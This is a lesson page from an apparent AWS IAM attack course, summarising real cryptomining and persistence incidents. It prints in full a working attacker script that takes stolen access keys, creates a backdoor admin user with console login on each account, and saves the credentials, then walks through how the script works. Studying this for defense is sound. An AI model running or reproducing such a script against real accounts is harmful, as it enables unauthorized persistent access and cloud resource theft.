This course was created to teach you IAM exploits that are actively being used by threat actors in the wild. This is not a theoretical course — this is as real as it gets.
While there are many more examples out there, here are 3 recent real-world case studies of attacks against organizations that made use of multiple tactics taught in this very course:
iam:CreateAccesKey
iam:AttachUserPolicy
iam:CreateLoginProfile
iam:PutUserPolicy
p0 Labs discovery (GUI-Vil cryptomining)
The first we’ll look at is research by p0 Labs that I made a video about because there’s a lot to learn from it. I recommend watching if you’re interested, but I’ll also provide a quick summary below.
- Stage 1: Gaining Initial Access
- Stage 2: Reconnaissance
- Stage 3: Privilege Escalation (if needed)
- Stage 4: Persistence and maintaining presence (aka creating backdoors)
- Stage 5: Complete mission
Stage 1: Gaining Initial Access
In this particular case study, GUI-vil used CVE-2021-22205, which according to NIST is a GitLab vulnerability that enabled Remote Code Execution (or RCE). The attacker exploited the vulnerability, and gained access to sensitive data by reviewing code repositories, which included the access key for an Admin level identity in the victim’s AWS environment.
Stage 2: Reconnaissance
GUI-Vil entered the access key ID and secret access key into S3 Browser, and then executed their first command which was to ListBuckets
against the S3 service.
Stage 3 & 4: PrivEsc and Persistence
GUI-Vil decided to establish persistence by using the access keys to issue the command CreateUser
, and they created an AWS IAM user named backup
. They then issued the command CreateAccessKey
to generate their own access keys for that backup
user.
Then, they issued the command PutUserPolicy
to create a policy named backupuser
which give full privileges to all resources and all actions for their backup
user. Essentially, these are admin-level privileges.
They also enabled AWS Console Access (iam:CreateLoginProfile
) for this user so that they can continue their attack from the management console instead of having to use the S3 Browser or command line interface.
All three: iam:CreateAccessKey
, iam:PutUserPolicy
, and iam:CreateLoginProfile
are taught in this course.
Stage 5: Complete mission
The attackers then moved on to launch EC2 instances for cryptomining.
p0 Labs discovery by Ian (establish persistence)
Another discovery by the p0 Labs team which Ian Ahl agreed to let me post here (thanks Ian!) is a script for AWS IAM persistence created by XAV:
import boto3
import string
import random
import os
from botocore.exceptions import ClientError
from termcolor import colored
log = f"""
______ __ _ __ ___ _ __
/ __ ) \\/ / | |/ // | | / /
/ __ |\\ / | // /| | | / /
/ /_/ / / / / |/ ___ | |/ /
/_____/ /_/ /_/|_/_/ |_|___/
AUTO CREATE IAM LOGIN AWS BY @awssl
DONATE ETH: redacted
"""
byxav = colored(log, "red")
show = byxav
print(show)
def genpwd(length=14):
characters = string.ascii_letters + string.digits + string.punctuation
password = ''.join(random.choice(characters) for _ in range(length))
return password
def make_panel(akiax, scrt, regg):
iam_client = boto3.client('iam', aws_access_key_id=akiax, aws_secret_access_key=scrt, region_name=regg)
username = 'administrateurs'
password = genpwd()
try:
response = iam_client.get_user(UserName=username)
print(colored(f"Username '{username}' already exists with key:{akiax}", 'red'))
return None, None, None
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchEntity':
pass
else:
print(colored(f"Failed to get user '{username}' with key:{akiax}'", 'red'))
return None, None, None
try:
response = iam_client.create_user(UserName=username)
iam = response['User']['Arn']
print(colored(f"IAM user {username} created successfully with key:{akiax}", 'white'))
try:
response = iam_client.create_login_profile(
UserName=username,
Password=password,
PasswordResetRequired=False
)
print(colored(f"Login profile created successfully for user {username} with key:{akiax}", 'white'))
response = iam_client.attach_user_policy(
UserName=username,
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
print(colored(f"Administrator policy attached to user {username} with key:{akiax}", 'white'))
return iam, username, password
except ClientError as e:
print(colored(f"Failed to create login profile for user {username} with key:{akiax}", 'red'))
return None, None, None
except ClientError as e:
print(colored(f"Failed to create IAM user with access key {akiax}", 'red'))
return None, None, None
def main():
lo = input('AWS KEY FILE:')
to = 'IAM-ACC.txt'
try:
with open(lo, 'r') as file:
for line in file:
akiax, scrt, regg = line.strip().split(':')
iam, username, password = make_panel(akiax, scrt, regg)
if iam is not None and username is not None and password is not None:
with open(to, 'a') as sev:
sev.write(f"IAM User ARN: {iam}\\n")
sev.write(f"IAM Username: {username}\\n")
sev.write(f"IAM Password: {password}\\n")
sev.write(f"{akiax}:{scrt}{regg}\\n")
sev.write("-----------------------\\n")
except FileNotFoundError:
print(colored(f"File '{lo}' not found", 'red'))
if __name__ == '__main__':
main()
Code language: Python (python)
As you can see, it creates an IAM username of “administrateurs” and attaches the managed Admin policy arn:aws:iam::aws:policy/AdministratorAccess
.
This is an approach and tactic we use in this course for some of the labs, so take note.
Let’s break down the script a bit more:
- On line 28, we see a
boto3.client()
call to prepare the call for making theadministrateurs
user and if that user doesn’t already exist in the environment, the script issues the create command on line 44 - On line 49, we see the command for
iam_client.create_login_profile()
- On line 56, the script attaches the
AdministratorAccess
managed policy to that user withiam_client.attach_user_policy
- At the very end in the
main()
function, the script creates a text file that stores the IAM user ARN, Username, Password, and access keys
DataDog report (cryptomining & data exfil)
The DataDog Security Labs team recently put out research highlighting how some of the cryptomining attacks are carried out from start to finish by attackers and it looks like this:
Initial Access
A common way for attackers to gain initial access is through a compromised IAM user access key, which this course will mimic by providing you with access keys as part of the lab deployment.
This can happen a few different ways including through social engineering (like with phishing attacks), through accidentally committing secrets in repositories, etc…
Enumeration
Next, the attacker will enumerate. In this case, they enumerated:
- Amazon SES – which is their simple email service…probably to see if they could use that for spam or phishing, but that’s just a guess
- IAM – by using
iam:ListUsers
which would list all users in that environment and will be a useful command throughout this course - Resource Explorer – which is a resource search and discovery service they would have used to find interested resources in the environment
- S3 – which is Amazon’s storage service, and they used
s3:ListBuckets
as well ass3:ListObjects
to see if there’s anything worth stealing, like customer PII (Personally Identifiable Information)
Persistence
The attacker also established persistence which is what’s going to be the most interesting and relevant to this course!
They used:
iam:CreateUser
– to generate a new IAM useriam:AttachUserPolicy
– which is one of the labs in this course that lets you attach any user policy you wantiam:CreateLoginProfile
– which is also another lab in this course that lets you set credentials for logging into the user’s AWS console
Minus creating users, the other two commands are privilege escalation commands used by threat actors in the wild as you can see here in order to not only establish persistence but also elevate privileges.
Lateral Movement, Exfiltration, Impact
Once they’ve established persistence, attackers will attempt lateral movement which they did here by using EC2 instance connect for SSH access.
They exfiltrated S3 data by using s3:GetObject
, and finally, they tried to launch multiple very expensive EC2 instances to start mining for crypto. The original article mentions that failed and so they pivoted to launching mining activities on Amazon ECS instead.
Conclusion
Now that you’ve seen real-world case studies, it’s time to learn how these attackers do it so you can find these types of weaknesses in your own environments, and then fix the issues. Let’s get started.
Responses